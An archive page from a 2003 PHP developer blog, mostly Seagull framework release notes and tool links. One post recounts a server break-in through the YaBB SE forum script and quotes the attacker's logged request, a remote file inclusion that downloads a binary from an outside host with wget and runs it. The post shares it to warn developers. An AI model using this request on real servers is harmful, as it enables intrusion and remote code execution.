Archive | October, 2003

Holee Progress Bars !!

Posted on 31 October 2003 by Demian Turner

I don’t know what it is about about a simple progress bar that can get one excited, but once you see what Laurent Laville has achieved in HTML with his PEAR class you’ll see what I mean.

Grab the class here, make sure to check out the examples here.

Comments (0)

Seagull 0.3.4-beta Released

Posted on 29 October 2003 by Demian Turner

Notable improvements:

  • Cacheing fully implemented on tabs and blocks, in some pages this amounts to a tenfold increase in speed – thanks to Andy Crain
  • Further security measures introduced
  • Install script can now be downloaded separately at SF – thanks to Thomas Moulard
  • bugfix now allows logging to DB target (Jan Tammen)

Quite a bit of activity on the SF mailing list, come and join us and lend a hand 🙂

Comments (0)

Posting Forms Securely

Posted on 29 October 2003 by Demian Turner

I’ve been having a two year battle with a bank of mine in Spain trying to convince them to improve the security of their web authentication.  My beef was that the default logon form appears on a non-SSL page, and even though it’s gets posted to an SSL target, I thought the details were being passed in the clear.

When in doubt post your query at Sitepoint 🙂  I had a lot of informative answers but what did it for me was downloading a free windows packet-sniffer and checking out exactly what was going on.

I used something called etherdetect which you can also grab from tucows.  Aside from a few ‘trial version’ messages it really does a great job, and is recommending ‘playing’ for all web developers.

Anyways, it turned out I was wrong, more details of the discussion are over at this Sitepoint thread.

Comments (1)

Interesting Hacking Ideas

Posted on 28 October 2003 by Demian Turner

In recent months I’ve attracted the attentions of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn’t seem to be widely documented on the web.

Finally I managed to close the hole, but after I had tried all the following:

  • shutdown all non-essential services on RH 7.3
  • shutdown FTP
  • reset all passwords
  • removed GCC from my system as the hacker was gaining access and compiling further C exploits
  • almost having had to change machines!

I was still getting compromised.  At first I thought this bastard was just a bot that automatically detected a security hole and was sending automated attacks.  But recently looking at his .bash_history I realised I had a fairy persistent pest on my hands.

Anyways, the security hole ended up being quite simple, wished I had discovered it earlier.  Turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about.  I present the details here in the hope they will help some write more secure scripts.

The request that the hacker was using to compromise the server was the following:

[root@www logs]# cat access_log | grep spc1
200.138.46.149 – – [25/Oct/2003:16:43:42 -0700] “GET /fishbowl/Sources/Packages.php?
sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;
%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1″ 200
255 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)”

Put through a little urldecode you get:

/fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir
/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1

Check out the cat.txt, it’s an interesting idea.  Looks like yabbse script presented a nice exec() or system() call for anyone to do what they wanted with.  I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, that’s if they have no prior development experience.  What’s strange is that yabbsee, currently in version 1.5.4 with quite a professional website, let this *censored*up slip through.

Many thanks to  Nick Rembis who pointed me in the right direction to closing this hole.

Comments (2)

RegExpEditor: Regular Expression GUI Tool

Posted on 22 October 2003 by Demian Turner

Hone your regex skills with this utility that will make a welcome addition to any developer’s toolbox.  Thanks to the folks at PHPedit the GUI app allows you to tweak your PCRE regular expressions with much less fuss than reloading browsers.

RexExpEditor, which is a free download, evaluates your expressions as you type, and has two minor but notable differences from how you would approach the preg-* family of functions in PHP:

  1. the beginning and ending forward slashes are implicit, don’t type them in
  2. enclose each match expression in (parentheses), even if it is only one

On a related note, be sure to check out Simon Willison’s interesting use of preg_replace_callback() – make sure you send an html string as arg to the function, at least something enclosed in one set of tags.

Or this use of create_function() for stripping selected tags from an html string.

Comments (0)

Seagull 0.3.3.p1-beta bugfix

Posted on 18 October 2003 by Demian Turner

To all who downloaded the Seagull 0.3.3 release, my apologies for a showstopper bug that crept if you’re running less than PHP 4.3.x.

You can either download the patched release here or simply change the single problematic line of code as follows.  Edit the file:

seagull/lib/pear/HTML/Template/Flexy/Compiler/Standard/Functions.php

and move the following line from the handle method:

        $class = __CLASS__;

AFTER the if statement.

Thanks to Thomas Moulard for pointing out this doozie.

Comments (0)

Seagull 0.3.3-beta Released

Posted on 16 October 2003 by Demian Turner

PHPkitchen’s a bit quiet these days but the Seagull changelog is long 😉  Notable improvements include:

  • latest Flexy integrated which means no more PHP short tags, no need to use update.php script, and you can raise your error_reporting to E_ALL
  • simple IP blocker incorporated for banning IPs you blacklist (thanks to Thomas Moulard)
  • cacheing introduced with PEAR’s Cache_Lite which dramatically speeds up some pages, like articles.php (thanks to Andy Crain)
  • french translations done for all the modules (thanks to Thomas Moulard)
  • BC workarounds added for earlier PHP versions, works fine on my 4.2.2 and may work on 4.1.x

Download the latest here.  And join up with our new SourceForge mailing list.  The account only came through a couple of days ago but soon you will be able to use all the usual SF tools: bug tracker, CVS, task mgr, downloads.

The mailing list will now be the main place for developer contributions, news, requesting support, etc., superseding the forums which will be kept open for archives only.

Please read the changelog for details on how to work with the latest Flexy, and for a few outstanding issues.

Comments (0)

phpJobScheduler – easily schedule your PHP scripts to run hourly, daily or weekly

Posted on 14 October 2003 by Demian Turner

phpJobScheduler – Designed to automate tasks by scheduling PHP scripts to run at set intervals, a replacement for cron jobs on Unix or scheduled tasks using Microsoft Scheduler. phpJobScheduler is a scheduler that runs using PHP and MySQL (no root/admin access is required). ITS FREE, full details at:

http://www.thedemosite.co.uk/phpjobscheduler/

Comments (1)

Seagull Process Flow in UML

Posted on 09 October 2003 by Demian Turner

Developer and pear-general regular Andy Crain recently attacked the Seagull app framework with a view to mapping out the process flow in UML.

The result is quite impressive, click here for the full-size sequence diagram (725 kb) – a great way to see at a glance what’s happening with the framework workflow.  You can also download the UML file for the Open Source UML CASE tool, Poseidon.

A big thanks to Andy and his impeccable patience and attention to detail 🙂

Seagull’s API docs were also updated yesterday, next is the overview documention, I promise.

Comments (6)

PHP Programming Marathon

Posted on 09 October 2003 by Demian Turner

DotGeek.org is proud to announce the first ever PHP Programming Marathon. The Programming Marathon is a special competition which takes place online on a specific date and time. Great prizes like the Elumix geek keyboard, Zend Studio and one year free hosting packages.

Are you ready for the challenge ?

Comments (0)

Categories

Books

Demian Turner's currently-reading book recommendations, reviews, favorite quotes, book clubs, book trivia, book lists

Facebook